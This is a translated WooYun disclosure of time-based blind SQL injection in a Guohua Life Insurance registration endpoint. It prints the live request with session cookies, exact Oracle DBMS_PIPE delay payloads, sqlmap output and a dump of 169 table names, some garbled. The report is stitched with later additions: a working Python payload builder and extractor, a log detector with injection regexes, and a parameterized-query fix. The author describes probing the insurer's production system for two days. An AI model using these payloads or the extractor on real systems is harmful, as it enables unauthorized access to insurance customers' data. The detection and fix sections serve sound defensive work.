
Vulnerability summary (followed by 24 users)

Defect ID: wooyun-2015-0126281

Title: SQL injection in a Guohua Life Insurance (国华人寿) endpoint

Vendor: 95549.cn

Author: 路人甲

Submitted: 2015-07-12 13:12

Fix time: 2015-07-17 13:14

Public disclosure: 2015-07-17 13:14

Type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: vendor notified, vendor ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:

Bookmarked by 4 users


Vulnerability details

Disclosure timeline:

2015-07-12: Details sent to the vendor, awaiting the vendor's response
2015-07-17: Vendor actively ignored the report; details disclosed to the public

Summary:

See title.

Details:

URL: http://eservice.95549.cn/eservice/account/register.action?action=initSingle, the Guohua Life user registration page. Enter any registered user, click "send verification code", type any 6 digits into the SMS verification code field, submit and capture the traffic. The first request is for the 4-character image captcha; the second request is the one with the SQL injection. The second request captured in Burp is a POST that sqlmap could not run, so I copied it, rewrote it as a GET request and saved it, then ran sqlmap on that; when running it you need to add sqlmap's "between" tamper script. The parameters mobile, phone_verification_code and operateType are all injectable, time-based blind SQL injection. So slow... it ran for two days and pulled out 169 table names.

GET /eservice/auth.action?action=confirmAuthcode&sid=Dkp3VhkHyVvHChN27FL0J4cLkyFy56f22Vd7v2JPcQmZTTvyh7Q2!122181249!328474508!1436673223428&mobile=18888888888&phone_verification_code=123456&operateType=7 HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: zh-cn
Referer: http://eservice.95549.cn/eservice/account/register.action?action=initSingle
Accept: application/json, text/javascript, */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.1)
Host: eservice.95549.cn
Content-Length: 0
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=Dkp3VhkHyVvHChN27FL0J4cLkyFy56f22Vd7v2JPcQmZTTvyh7Q2!122181249!328474508; K_V_D_JSESSIONID=aocimmlclhonbojgiielbdhajhfcdiaohjoamielbhoclepkhndlkmnhlmapcjdnbbeeabgaaidg; _ga=GA1.2.2127493268.1436673240; _gat=1; __utmt=1; __ghuid=87081851436673240202.1436673240202; Hm_lvt_8f5497008cc4aa3ad167a3dc40681432=1436673240; Hm_lpvt_8f5497008cc4aa3ad167a3dc40681432=1436673242; __utma=82279902.2127493268.1436673240.1436673240.1436673240.1; __utmb=82279902.2.10.1436673240; __utmc=82279902; __utmz=82279902.1436673240.1.1.utmcsr=wooyun.org|utmccn=(referral)|utmcmd=referral|utmcct=/corps/%E5%9B%BD%E5%8D%8E%E4%BA%BA%E5%AF%BF%E4%BF%9D%E9%99%A9%E8%82%A1%E4%BB%BD%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8; OZ_1U_2108=vid=v5a1e4d8af24b6.0&ctime=1436673301&ltime=1436673241; OZ_1Y_2108=erefer=%20http%3A//www.wooyun.org/corps/%25E5%259B%25BD%25E5%258D%258E%25E4%25BA%25BA%25E5%25AF%25BF%25E4%25BF%259D%25E9%2599%25A9%25E8%2582%25A1%25E4%25BB%25BD%25E6%259C%2589%25E9%2599%2590%25E5%2585%25AC%25E5%258F%25B8&eurl=http%3A//www.95549.cn/&etime=1436673239&ctime=1436673301&ltime=1436673241&compid=2108
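The time-based extraction the author describes, shown as an added example that is not part of the original report and not sqlmap's own code: a Python stand-in for the injectable phone_verification_code handling that models only the observable latency (a fake clock, so it runs instantly), plus a sqlmap-style extractor that writes its comparisons with BETWEEN the way the "between" tamper script does. MockBackend, its SECRET answer and the baseline/delay numbers are constructed assumptions; the real back end is Oracle, where DBMS_PIPE.RECEIVE_MESSAGE on an unused pipe blocks for the requested number of seconds and returns 1 (timeout).

```python
import re
from typing import Callable, Dict

# Constructed mock of the injectable parameter handling behind
# auth.action?action=confirmAuthcode. The real back end is Oracle behind a
# Java servlet; this stand-in models only what a time-based blind attacker
# observes (response time) and uses a fake clock so the example runs instantly.
# SECRET is an assumed answer for the probed expression, not data from the page.
SECRET: Dict[str, str] = {"SELECT USER FROM DUAL": "ESERVICE"}

# The one condition shape the extractor below injects:
#   NVL(ASCII(SUBSTR((<expr>),<pos>,1)),0) [NOT] BETWEEN <lo> AND <hi>
_COND = re.compile(
    r"NVL\(ASCII\(SUBSTR\(\((?P<expr>[^)]*)\),(?P<pos>\d+),1\)\),0\) "
    r"(?P<neg>NOT )?BETWEEN (?P<lo>\d+) AND (?P<hi>\d+)"
)


class MockBackend:
    """Pretends to run ... WHERE code = '<phone_verification_code>' ...

    When the injected CASE condition is true the query reaches
    DBMS_PIPE.RECEIVE_MESSAGE and stalls for `delay` seconds; when it is
    false only the baseline latency is paid.
    """

    def __init__(self, delay: float = 5.0, baseline: float = 0.3) -> None:
        self.delay = delay
        self.baseline = baseline
        self.requests = 0

    def handle(self, phone_verification_code: str) -> float:
        """Return the simulated response time in seconds."""
        self.requests += 1
        elapsed = self.baseline
        m = _COND.search(phone_verification_code)
        if m and "DBMS_PIPE.RECEIVE_MESSAGE" in phone_verification_code:
            value = SECRET.get(m.group("expr"), "")
            pos = int(m.group("pos"))
            # SUBSTR past the end is NULL; NVL(...,0) turns that into 0.
            ch = ord(value[pos - 1]) if pos <= len(value) else 0
            inside = int(m.group("lo")) <= ch <= int(m.group("hi"))
            if inside != bool(m.group("neg")):
                elapsed += self.delay
        return elapsed


def build_payload(expr: str, pos: int, cond: str, delay: int = 5) -> str:
    """sqlmap-style Oracle time-based payload for phone_verification_code.

    Comparisons are written with BETWEEN instead of '>' / '=', which is what
    sqlmap's 'between' tamper does to get past filters on those operators.
    DBMS_PIPE.RECEIVE_MESSAGE returns 1 on timeout, so '1=(CASE ...)' is true
    on both branches: the only signal is the delay.
    """
    return (
        "123456' AND 1=(CASE WHEN (NVL(ASCII(SUBSTR(({expr}),{pos},1)),0) {cond}) "
        "THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(111)||CHR(121)||CHR(79),{delay}) "
        "ELSE 1 END) AND 'a'='a"
    ).format(expr=expr, pos=pos, cond=cond, delay=delay)


def extract(send: Callable[[str], float], expr: str, delay: int = 5,
            max_len: int = 32, retries: int = 3) -> str:
    """Recover the value of `expr` one character at a time.

    Each character costs a 7-request binary search on its ASCII code using
    'NOT BETWEEN 0 AND mid' (i.e. ch > mid) plus one exact 'BETWEEN c AND c'
    confirmation. The confirmation guards against the corrupted names in the
    table dump above: one mis-timed response during the search silently flips
    a bit of the character, but it then fails the confirm and the position is
    searched again.
    """
    threshold = delay * 0.8          # a true branch costs at least `delay` s
    out = []
    for pos in range(1, max_len + 1):
        for _ in range(retries):
            lo, hi = 0, 127
            while lo < hi:
                mid = (lo + hi) // 2
                probe = build_payload(expr, pos, f"NOT BETWEEN 0 AND {mid}", delay)
                if send(probe) >= threshold:
                    lo = mid + 1
                else:
                    hi = mid
            check = build_payload(expr, pos, f"BETWEEN {lo} AND {lo}", delay)
            if send(check) >= threshold:
                break
        else:
            raise RuntimeError(f"position {pos}: timing too noisy after {retries} tries")
        if lo == 0:                  # NVL(...,0): walked past the end
            break
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    backend = MockBackend()
    print(extract(backend.handle, "SELECT USER FROM DUAL"), "in", backend.requests, "requests")
```

Eight requests per character, with roughly half of them stalling for the full 5 seconds, is why a dump of 169 table names takes days; the corrupted entries in the table list below are what a slow or dropped response read as "false" produces when no confirmation probe is run.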


sqlmap identified the following injection points with a total of 89 HTTP(s) requests:
---
Place: GET
Parameter: phone_verification_code
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: action=confirmAuthcode&sid=s8nMVg7Sf0bYTfpTQzWJKPKQgZFqCS4cLXb1xcGT3fVTz17VFq2n!-29301160!122181249!1436580754408&mobile=18888888888&phone_verification_code=412779' AND 6774=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(111)||CHR(121)||CHR(79),5) AND 'dVhA'='dVhA&operateType=7
---
web application technology: Servlet 2.5, JSP 2.1, Nginx
back-end DBMS: Oracle
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: phone_verification_code
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: action=confirmAuthcode&sid=s8nMVg7Sf0bYTfpTQzWJKPKQgZFqCS4cLXb1xcGT3fVTz17VFq2n!-29301160!122181249!1436580754408&mobile=15927548246&phone_verification_code=412779' AND 6774=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(111)||CHR(121)||CHR(79),5) AND 'dVhA'='dVhA&operateType=7
---
web application technology: Servlet 2.5, JSP 2.1, Nginx
back-end DBMS: Oracle
current user: 'ESERVICE'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: phone_verification_code
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: action=confirmAuthcode&sid=s8nMVg7Sf0bYTfpTQzWJKPKQgZFqCS4cLXb1xcGT3fVTz17VFq2n!-29301160!122181249!1436580754408&mobile=18888888888&phone_verification_code=412779' AND 6774=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(111)||CHR(121)||CHR(79),5) AND 'dVhA'='dVhA&operateType=7
---
web application technology: Servlet 2.5, JSP 2.1, Nginx
back-end DBMS: Oracle
available databases [1]:
[*] ESERVICE
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: phone_verification_code
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: action=confirmAuthcode&sid=s8nMVg7Sf0bYTfpTQzWJKPKQgZFqCS4cLXb1xcGT3fVTz17VFq2n!-29301160!122181249!1436580754408&mobile=18888888888&phone_verification_code=412779' AND 6774=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(111)||CHR(121)||CHR(79),5) AND 'dVhA'='dVhA&operateType=7
---
web application technology: Servlet 2.5, JSP 2.1, Nginx
back-end DBMS: Oracle
Database: ESERVICE
[169 tables]
+-------------------------------------------+
| EBIZ_DOWNLOAD_HIS\X03 |
| EBIZ_ORDER! |
| EBIZ_ORDER!ACCOUNT |
| EBIZ_ORDER_AUTH\X07A |
| EBIZ_ORDER_SURRENDER\X02\X02A |
| EBIZ_PERIOD\\?81C_ORDER\X07\X11 |
| EBIZ_POINT_EXCHANGE_DETAIM\X11A!A\X04\X05 |
| EBIZ_POINT_HISTORY\R1 |
| EBIZ_PRODUCT_RECOMMEND\X02 |
| EBIZ_P\X7FYOENT |
| EBIZ_P\\X7FYOC_OPGRATH |
| EBIZ_STATISTICS_HIS_BAK_140609\X19 |
| EBIZ_STATISTICS_RECORD_TEMP\X05\X11 |
| EBIZ_STATISTICS_XISITOY^\R |
| EBIZ_SY_{ANKS! |
| EBIZ_TEL_ACT_PROAA\X05 |
| EBIZ_TEL_USER_DEPT\X05 |
| EBIZ_TEL_USER_ROLE!\T |
| EBIZ_TEL_\\?81ESERVE |
| EBIZ_THIRD_AUTH\X03 |
| EBIZ_THIRD_TERMINA\\?81ION |
| EBIZ_THIRD_TRADE_H?S |
| EBIZ_USER_BI?DCA\\?81D |
| EBIZ_USER_CERTIFY_IMAG\\?81 |
| EBIZ_USER_MERGE\X05 |
| EBIZ_USER_MERGE_DETAIL\R |
| EBIZ_USER_S?BSCRIBE |
| EBIZ_USER_SETTIN銡? |
| EBIZ_USER_THIR?_INFO |
| EBIZ_USER_WEIXIN_I\\?81FO |
| EBIZ_VALIDATE_U\\?81L |
| EBIZ_WEIXIN_MESSAGE呓 |
| MAIL_MAIN_A\\?81TAC酄侻ENT_TAB |
| NETEASY_\\?81HECK_DATA |
| ORDER_RECOMMEND\T |
| CLOUD_EBIZ_APPNT |
| CLOUD_EBIZ_BNF |
| CLOUD_EBIZ_IMPART |
| CLOUD_EBIZ_IMPART_ITEM |
| CLOUD_EBIZ_INSURED |
| CLOUD_EBIZ_ORDER |
| CLOUD_EBIZ_ORDER_ACCOUNT |
| CLOUD_EBIZ_ORDER_INSURANCE |
| CLOUD_EBIZ_ORDER_RECOMMEND |
| CLOUD_EBIZ_THIRD_ORDER |
| EBIZ_ACCOUNT_AUTH |
| EBIZ_ACCOUNT_SECURITY |
| EBIZ_APPNT |
| EBIZ_APPNT_AUTHORITY |
| EBIZ_BATCH_INFO |
| EBIZ_BNF |
| EBIZ_CHECKRULEATEMPLATE |
| EBIZ_CHECK_BATCH |
| EBIZ_CHECK_DETAIL |
| EBIZ_CLAIM |
| EBIZ_CLAIM_IMAGE |
| EBIZ_CLAIM_REPORT |
| EBIZ_CODE |
| EBIZ_CONT_ADDPREM |
| EBIZ_CONT_MODIFY |
| EBIZ_CONT_REBUY |
| EBIZ_CONT_RENEWAL |
| EBIZ_CONT_RENEWAL_DETAIL |
| EBIZ_CORE_INSURANCE_IMPORT |
| EBIZ_ELEC_CONT |
| EBIZ_ELEC_NOTICE |
| EBIZ_ID_VERIFY |
| EBIZ_IMPART_ITEMA |
| EBIZ_IMPARA |
| EBIZ_INSURED |
| EBIZ_IP_RECORD |
| EBIZ_LOGIN_CHECK |
| EBIZ_MAIL_SEND |
| EBIZ_MESSAGE_EXCHANGE |
| EBIZ_MESSAGE_TEMPLATE |
| EBIZ_MOBILE_RECHARGE |
| EBIZ_MOCUPATION |
| EBIZ_OPER_HIS |
| EBIZ_ORDER_INSURANCE |
| EBIZ_ORDER_PRESENT |
| EBIZ_ORDER_REVISIT_DETAIL |
| EBIZ_ORDER_REVJSIT |
| EBIZ_ORDER_RISM_AMNT |
| EBIZ_ORDER_TYPE_PROPERTY |
| EBIZ_PERIODIC_PRODUCT |
| EBIZ_POINT_ACCOUNT |
| EBIZ_POINT_AUDIT |
| EBIZ_POINT_EVENTA |
| EBIZ_POINT_EXCHANGE |
| EBIZ_POINT_GIFT |
| EBIZ_POINT_ORDEQ |
| EBIZ_POINT_PLATFORM |
| EBIZ_POINT_RUYE |
| EBIZ_POINT_TASK |
| EBIZ_PORTRAY_ATTACH |
| EBIZ_PRODUCT |
| EBIZ_PRODUCT_CATE |
| EBIZ_PRODUCT_CHECKRUAE |
| EBIZ_PRODUCT_OCCUPATION |
| EBIZ_PRODUCT_PRESENT |
| EBIZ_PRODUCT_PROPERTY |
| EBIZ_PRODUCT_RATE |
| EBIZ_PRODUCT_RATE_DESC |
| EBIZ_PUBLIC_ALARM |
| EBIZ_PUBLIC_FEEBACK |
| EBIZ_PUBLIC_MENU |
| EBIZ_PUBLIC_MESSAGE_REMARK |
| EBIZ_PUBLIC_MESSAGF |
| EBIZ_PUBLIC_MSG_EXCHANGE |
| EBIZ_PUBLIC_PLATFORM |
| EBIZ_PUBLIC_RECEIVE_CONAIG |
| EBIZ_PUBLIC_SEND |
| EBIZ_PUBLIC_USER |
| EBIZ_QUESTION_SURVEY |
| EBIZ_RECOMMEND_YHANNEL |
| EBIZ_RISK_PROPERTY |
| EBIZ_STATISTICS_HIS |
| EBIZ_STATISTICS_HIS_BAK_150108 |
| EBIZ_STATISTICS_HIS_BAK_150618 |
| EBIZ_ST_BAOKLOCATIONS |
| EBIZ_SY_STAQDARDAREAS |
| EBIZ_TEL_DEDER |
| EBIZ_TEL_DEPZ |
| EBIZ_TEL_RETULE |
| EBIZ_TEL_ROLE |
| EBIZ_TEL_USER |
| EBIZ_TELAACTIVITY |
| EBIZ_THIRD_ADDPREM |
| EBIZ_THIRD_CANT_SYNC |
| EBIZ_THIRD_FILE |
| EBIZ_THIRD_FOTIFY |
| EBIZ_THIRD_ORDER |
| EBIZ_THIRD_REFUND |
| EBIZ_THIRD_SURRENDER |
| EBIZ_THIRD_TRADE |
| EBIZ_THIRD_TRADE_BAK |
| EBIZ_THIRD_TRADE_BAK_20140220 |
| EBIZ_THIRD_TRADE_BAK_201402301 |
| EBIZ_THIRD_TRADE_BAK_20140917 |
| EBIZ_THIRD_TRADE_BAK_20140917A |
| EBIZ_THIRD_TRADE_BAK_20150618 |
| EBIZ_USER_HIS |
| EBIZ_VALIDATE_CODE |
| EBIZ_WEIXIN_MESSAGE |
| MAIL_MAIN_ATTACHMENT_TAB_BAK |
| MAIL_MAIN_TAB_BAK |
| MAIL_MAIN_TAB_BAK_20140918 |
| MAIL_MAIN_TAA |
| NETEASY_TEMP |
| PF_CODE1 |
| PF_CPERMISSION |
| PF_CROLE |
| PF_CROLECPERMISSION |
| PF_CROLECUSTOMERA |
| PF_CUSTOMERA |
| TEMP_BANKLOCATIONS |
| TEMP_TAOBAO1212 |
| TEMP_TAOBAO1212_YYKH |
| TEMP_TAOBAO1212_ZM |
| TEMP_UNIONID |
| TEMP_YLB_IMPORT |
| TEMP_YLB_PRINT |
| TEMP_YLB_REVISIT |
| TEMP_YLB_REVISIT2 |
| TOPIC_ACTIVITY |
| TOPIC_ACTIVITY_INVOLVE |
| TOPIC_ACTIVITY_RECOMMEND |
| TOPIC_SNOWY_CHILDREN |
| WEIXIN_MAIN_TAB |
+-------------------------------------------+
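The detection side of the same run, as an added example that is not part of the report: a small parser for nginx access-log lines (nginx fronts this application according to the sqlmap banner) that flags the two fingerprints a time-based sqlmap session leaves, Oracle delay primitives in the query string and a burst of multi-second responses from one client against one endpoint. The log lines are constructed for the example (the $request_time field is assumed to be appended to the combined format); they are not from the target's logs.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote_plus

# Constructed nginx access-log lines: combined format with $request_time
# appended. Made up to exercise the detector; not taken from the target.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Jul/2015:13:01:01 +0800] "GET /eservice/auth.action?action=confirmAuthcode&mobile=18888888888&phone_verification_code=123456&operateType=7 HTTP/1.1" 200 57 "-" "Mozilla/4.0" 0.312
203.0.113.7 - - [12/Jul/2015:13:01:09 +0800] "GET /eservice/auth.action?action=confirmAuthcode&mobile=18888888888&phone_verification_code=412779%27%20AND%206774%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28111%29%2C5%29%20AND%20%27dVhA%27%3D%27dVhA&operateType=7 HTTP/1.1" 200 57 "-" "Mozilla/4.0" 5.318
203.0.113.7 - - [12/Jul/2015:13:01:15 +0800] "GET /eservice/auth.action?action=confirmAuthcode&mobile=18888888888&phone_verification_code=412779%27%20AND%201%3D%28CASE%20WHEN%20%28ASCII%28SUBSTR%28%28SELECT%20USER%20FROM%20DUAL%29%2C1%2C1%29%29%20NOT%20BETWEEN%200%20AND%2063%29%20THEN%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%2C5%29%20ELSE%201%20END%29%20AND%20%27a%27%3D%27a&operateType=7 HTTP/1.1" 200 57 "-" "Mozilla/4.0" 5.301
203.0.113.7 - - [12/Jul/2015:13:01:21 +0800] "GET /eservice/auth.action?action=confirmAuthcode&mobile=18888888888&phone_verification_code=412779%27%20AND%201%3D%28CASE%20WHEN%20%28ASCII%28SUBSTR%28%28SELECT%20USER%20FROM%20DUAL%29%2C1%2C1%29%29%20NOT%20BETWEEN%200%20AND%2095%29%20THEN%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%2C5%29%20ELSE%201%20END%29%20AND%20%27a%27%3D%27a&operateType=7 HTTP/1.1" 200 57 "-" "Mozilla/4.0" 0.305
198.51.100.2 - - [12/Jul/2015:13:02:00 +0800] "GET /eservice/auth.action?action=confirmAuthcode&mobile=13900000000&phone_verification_code=654321&operateType=7 HTTP/1.1" 200 57 "-" "Mozilla/5.0" 0.298
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" (?P<rt>[\d.]+)$'
)

# Oracle delay/side-channel primitives and the operator shapes sqlmap emits
# (including the BETWEEN form produced by the 'between' tamper).
SQLI_RE = re.compile(
    r"DBMS_PIPE\.RECEIVE_MESSAGE|DBMS_LOCK\.SLEEP|UTL_INADDR\.|"
    r"\bCHR\(\d+\)|\bNOT BETWEEN 0 AND \d+|'\s*(AND|OR)\b",
    re.IGNORECASE,
)


def parse(line: str) -> Optional[dict]:
    """Split one access-log line; the query string is URL-decoded once so that
    %27 / %28 style encoding does not hide the payload from SQLI_RE."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    path, _, qs = rec["target"].partition("?")
    rec["path"] = path
    rec["query"] = unquote_plus(qs)
    rec["rt"] = float(rec["rt"])
    return rec


def detect(log_text: str, slow: float = 4.0, burst: int = 2
           ) -> Tuple[List[Tuple[str, str, str]], Dict[Tuple[str, str], int]]:
    """Return (payload_hits, slow_bursts).

    payload_hits: (client ip, path, matched indicator) for every request whose
    decoded query string contains an injection indicator.
    slow_bursts: (client ip, path) -> count, for clients with at least `burst`
    responses slower than `slow` seconds on one endpoint. The second signal
    is independent of the payload text, so it still fires when a tamper
    script has rewritten the SQL into something SQLI_RE does not know.
    """
    payload_hits: List[Tuple[str, str, str]] = []
    slow_by_client: Dict[Tuple[str, str], int] = defaultdict(int)
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        hit = SQLI_RE.search(rec["query"])
        if hit:
            payload_hits.append((rec["ip"], rec["path"], hit.group(0)))
        if rec["rt"] >= slow:
            slow_by_client[(rec["ip"], rec["path"])] += 1
    bursts = {k: v for k, v in slow_by_client.items() if v >= burst}
    return payload_hits, bursts


if __name__ == "__main__":
    hits, bursts = detect(SAMPLE_LOG)
    for ip, path, indicator in hits:
        print("payload", ip, path, repr(indicator))
    for (ip, path), n in bursts.items():
        print("slow burst", ip, path, n)
```

In a real deployment the slow-response threshold should sit just under the delay an attacker is likely to request (sqlmap's default is 5 seconds), and the per-client counter needs a time window; both are left as fixed numbers here.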


Screenshots: 1.png, 2.png, 3.png, 4.png, 5.png, 6.png, 7.png

Proof of vulnerability:

Screenshots 1.png through 7.png (the same images as above)

Suggested fix:

Filter.
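One way to implement the suggested fix, shown as an added example that is not the application's own (Java/Oracle) code: allow-list validation of both inputs before any query runs, and bind parameters for the query itself so the input can never be parsed as SQL. The table, column names and sqlite3 stand-in are assumptions chosen so the example runs offline; on the real stack the same shape is a JDBC PreparedStatement with setString.

```python
import re
import sqlite3

# Constructed stand-in for the verification-code lookup behind
# auth.action?action=confirmAuthcode. Table and column names are assumptions.
MOBILE_RE = re.compile(r"^1\d{10}$")   # 11-digit mainland China mobile number
CODE_RE = re.compile(r"^\d{6}$")       # the 6-digit SMS code the page describes


def make_db() -> sqlite3.Connection:
    """In-memory database with one pending code (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sms_code (mobile TEXT, code TEXT)")
    conn.execute("INSERT INTO sms_code VALUES ('18888888888', '482913')")
    conn.commit()
    return conn


def confirm_code_vulnerable(conn: sqlite3.Connection, mobile: str, code: str) -> bool:
    # BEFORE: user input is pasted into the SQL text. A quote in the input
    # closes the literal and the rest of the string becomes SQL. On Oracle the
    # attacker's payload is DBMS_PIPE.RECEIVE_MESSAGE as shown above; here the
    # same structural flaw is shown with a plain tautology.
    sql = ("SELECT COUNT(*) FROM sms_code WHERE mobile = '%s' AND code = '%s'"
           % (mobile, code))
    return conn.execute(sql).fetchone()[0] > 0


def confirm_code_fixed(conn: sqlite3.Connection, mobile: str, code: str) -> bool:
    # AFTER, step 1: reject anything not shaped like a phone number / code
    # before it reaches the database. This is a positive allow-list; a
    # blacklist of operators is exactly what tamper scripts such as 'between'
    # exist to get around.
    if not MOBILE_RE.match(mobile) or not CODE_RE.match(code):
        return False
    # AFTER, step 2: bind the values as parameters. The query text is fixed at
    # compile time and the input is only ever data.
    row = conn.execute(
        "SELECT COUNT(*) FROM sms_code WHERE mobile = ? AND code = ?",
        (mobile, code),
    ).fetchone()
    return row[0] > 0


if __name__ == "__main__":
    db = make_db()
    bypass = "x' OR '1'='1"
    print("vulnerable, injected code accepted:", confirm_code_vulnerable(db, "18888888888", bypass))
    print("fixed, injected code accepted:     ", confirm_code_fixed(db, "18888888888", bypass))
    print("fixed, real code accepted:         ", confirm_code_fixed(db, "18888888888", "482913"))
```

Validation alone is not the fix: the parameter binding is what removes the injection, and the allow-list is there so that a later developer who relaxes the regex does not reopen it.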

Copyright notice: when reposting, credit 路人甲@乌云 (WooYun)


Vendor response

Vendor reply:

Severity: No impact, vendor ignored the report

Ignored on: 2015-07-17 13:14

Vendor comment:

Vulnerability Rank: 15 (WooYun rating)

Latest status:

None